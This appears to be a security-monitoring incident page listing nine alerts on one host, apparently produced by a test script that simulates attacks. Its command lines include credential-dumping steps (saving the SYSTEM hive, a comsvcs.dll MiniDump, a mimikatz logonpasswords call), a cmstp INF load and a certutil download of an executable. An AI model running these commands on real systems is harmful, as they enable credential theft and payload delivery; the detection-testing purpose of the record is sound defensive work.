Back to list

Critical CINC-20251220-9EF8C2DB new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8893880251

Incident Overview

Incident ID CINC-20251220-9EF8C2DB
Severity Critical (90)
Status new
Alert Count 9
Host Count 1

Timeline

First Seen 2025-12-19 13:22:10
Last Seen 2025-12-19 13:23:54
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Defense Evasion Credential Access Command and Control
Techniques:
User Execution CMSTP OS Credential Dumping Rundll32 Ingress Tool Transfer

Affected Hosts (1)

TEAHEE

Related Alerts (9)

Severity Status Hostname Description Tactic Command Line Time
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-19 13:23
High new TEAHEE A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf 12-19 13:23
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv 12-19 13:23
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-19 13:23
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" 12-19 13:23
Critical new TEAHEE A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. Credential Access rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-19 13:23
High new TEAHEE A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" 12-19 13:23
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe 12-19 13:23
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-19 13:22